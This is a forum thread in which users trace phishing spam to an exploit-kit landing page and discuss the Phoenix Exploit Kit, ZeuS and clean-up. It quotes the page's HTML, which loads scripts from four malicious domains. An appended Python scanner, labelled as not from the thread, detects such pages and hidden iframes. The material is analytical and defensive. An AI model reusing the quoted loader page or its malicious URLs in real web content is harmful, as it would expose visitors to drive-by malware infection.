Posted By: Virtual1 anyone else getting Smith Micro spam? - 03/13/12 04:01 PM
I make new addresses for the different businesses I email to, so I can tell who is responsible for spam and phishing.

I started receiving phishing emails a few days ago to the address I created for emailing Smith Micro. I think they're the ones that bought out Stuffit? Anyone else getting these?

Both times in the past I've tried to call and complain about someone getting me on a spam/phish list (Ford and NewEgg most recently) they've denied the possibility of any involvement. (not surprising I suppose)
Posted By: tacit Re: anyone else getting Smith Micro spam? - 03/15/12 05:09 PM
Generally speaking, if you start getting spam to an email address, there are a few possibilities:

- The spammers found it on a Web site, forum, or email group.
- The spammers found it by doing a dictionary attack.
- You used it on a Web site or online ordering system that was hacked.
- You gave it to someone who gave, sold, or rented it to the spammers.
- You gave it to someone who was then hacked.
- You gave it to someone who is infected with an email-scraping virus.

If this email was created only for Smith Micro, that rules out the first two possibilities, leaving only the bottom four. Smith Micro probably didn't intentionally sell it on to phishers, which means they have been hacked, they are using a computer infected with a virus, or the spammers found the email address by using a brute-force dictionary attack.

How unusual is the email address? Does it use dictionary words?
Posted By: Virtual1 Re: anyone else getting Smith Micro spam? - 03/15/12 05:14 PM
I typically use "v1" and the company name, @vftp.net as my alias. I obviously don't post it publicly. The prepending of "v1" to the start of the addresses makes them fairly resistant to dictionary attacks. I've checked my server logs a few times in the past looking for such mischief and other than the expected dictionary attempts I don't see much.

So I follow the same conclusion as you, hacked or botnetted. Either way probably a waste of my time to contact them, they're unlikely to admit to either.
Posted By: Virtual1 Re: anyone else getting Smith Micro spam? - 03/16/12 02:08 PM
And I continue to get spam that looks like my "intuit order" is ready. Spam emails originate from Tunisia. The link tries to get me to go here:

http//livonya.com/BNCGCPNP/index.html
(attempting to autolink that url was not appreciated, ubb)

which does a really odd thing, it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

Or maybe a cocktail? Curling that URL gives:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://africafe.hu/xyv9H9GN/js.js"></script>
<script type="text/javascript" src="http://asflexs.com/5w5txgvh/js.js"></script>
<script type="text/javascript" src="http://phreklam.com/zWNrFqKG/js.js"></script>
<script type="text/javascript" src="http://zizula.ro/RxTXmiNk/js.js"></script>

</html>
Posted By: tacit Re: anyone else getting Smith Micro spam? - 03/16/12 05:17 PM
It's the Phoenix Exploit Kit.

The Web site looks at the browser, platform, plugins, and other configuration information, then attempts a cocktail of browser, Java, Flash, and PDF exploits to download the W32/ZeuS malware. I've been seeing a lot of these lately.

W32/ZeuS is a modular, programmable, configurable malware strain that's sold in underground carder communities as a do-it-yourself kit. Once it infects a computer, it waits silently until a person attempts to visit a bank site or a site like PayPal. When that happens, it begins keystroke logging and then sends the person's login credentials to a server under the control of the person who set it up. It uses advanced encryption and other techniques to mask its communication with the server.

Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.
Posted By: artie505 Re: anyone else getting Smith Micro spam? - 03/16/12 05:44 PM
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.
Posted By: artie505 Re: anyone else getting Smith Micro spam? - 03/16/12 06:14 PM
> [...] it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

After seeing that it's Windows only I entered the URL and was taken to what looks like a clothing sales site.

The home page displayed a log-in pane with name and password pre-entered, which I wasn't curious enough to click on.
Posted By: artie505 Re: anyone else getting Smith Micro spam? - 03/16/12 10:35 PM
I forgot to mention in my last post that somewhere on the road to that shopping site I acquired a microsoft.com cookie. Curious?
Posted By: ryck Re: anyone else getting Smith Micro spam? - 03/17/12 09:35 AM
I'd label it curious. I just checked my cookies and, although I have various Microsoft sites I visit (due to needing support for my Office software), I do not have a cookie called microsoft.com.
Posted By: Virtual1 Re: anyone else getting Smith Micro spam? - 03/19/12 03:44 PM
Originally Posted By: artie505
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.
AFAIK all the exploits it is using and attempting to install are for windows. After trying to compromise your browser and failing, it dumps you off at some other web page.
Posted By: Virtual1 Re: anyone else getting Smith Micro spam? - 03/19/12 03:46 PM
Originally Posted By: tacit
Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.

Wow. I didn't know that. What do you do then? Reformat and restore safe documents?
Posted By: tacit Re: anyone else getting Smith Micro spam? - 03/22/12 07:03 AM
Originally Posted By: Virtual1
AFAIK all the exploits it is using and attempting to install are for windows. After trying to compromise your browser and failing, it dumps you off at some other web page.
Yep. There are several exploit kits that are shopped around to malware writers to help them spread their malware, the two most common being the Blackhole Exploit Kit and the Phoenix Exploit Kit. Both can be configured to drop any malware (not just ZeuS) and both can be configured to send the user elsewhere if the exploits all fail or if the page is loaded in a way that the malware writer doesn't want.

For example, the Phoenix Exploit Kit is often configured in such a way that if you surf to it directly it'll redirect elsewhere; it attempts the exploit if it's loaded in an iFrame. The bad guys then compromise other sites and inject iFrames into them.

Originally Posted By: Virtual1
Wow. I didn't know that. What do you do then? Reformat and restore safe documents?

Yep. Microsoft Security Essentials can remove some of the older variants of ZeuS, but for modern variants, or for some other similar malware? Yep, reformat and restore is Microsoft's recommended course of action.
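As an added example (not code from this thread or from any of the posters), here is a small stdlib-only scanner for the two artifacts the thread describes: the bare "Loading..." landing page Virtual1 curled, which pulls js.js from several unrelated domains, and the hidden iFrames tacit mentions being injected into compromised sites to load such a page. The thresholds, the `.invalid`/`.example` hosts and the second and third sample pages are constructed assumptions; the first sample is the HTML quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _Collector(HTMLParser):
    """Collect external script sources, iframe tags and visible text."""
    def __init__(self):
        super().__init__()
        self.scripts, self.iframes, self.text = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "iframe":
            self.iframes.append(a)

    def handle_data(self, data):
        if data.strip():
            self.text.append(data.strip())


def _hidden(attrs):
    # Injected iframes are usually sized 0/1 px or hidden via CSS.
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


def scan(html, page_host):
    """Return findings; 'suspicious' fires on either pattern (thresholds assumed)."""
    c = _Collector()
    c.feed(html)
    foreign = {urlparse(s).hostname for s in c.scripts
               if urlparse(s).hostname and urlparse(s).hostname != page_host}
    hidden = [a.get("src", "") for a in c.iframes if _hidden(a)]
    # Landing-page heuristic: almost no text, scripts from 3+ third-party hosts.
    loader = len(foreign) >= 3 and len(" ".join(c.text)) < 80
    return {"script_hosts": sorted(foreign), "hidden_iframes": hidden,
            "loader_page": loader, "suspicious": loader or bool(hidden)}


# Sample 1: the page quoted in the thread (domains as posted there).
LANDING = """<html><h1>WAIT PLEASE</h1><h3>Loading...</h3>
<script type="text/javascript" src="http://africafe.hu/xyv9H9GN/js.js"></script>
<script type="text/javascript" src="http://asflexs.com/5w5txgvh/js.js"></script>
<script type="text/javascript" src="http://phreklam.com/zWNrFqKG/js.js"></script>
<script type="text/javascript" src="http://zizula.ro/RxTXmiNk/js.js"></script>
</html>"""
# Sample 2 (constructed): a legitimate shop page with one injected hidden iframe.
INJECTED = ('<html><body><p>Welcome to our store, browse the catalog below.</p>'
            '<iframe src="http://landing.invalid/index.html" width="1" height="1"'
            ' style="display:none"></iframe></body></html>')
# Sample 3 (constructed): a clean page loading one first-party and one CDN script.
CLEAN = ('<html><body><h1>Shop</h1><script src="https://shop.example/app.js">'
         '</script><script src="https://cdn.example/lib.js"></script></body></html>')
```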
© FineTunedMac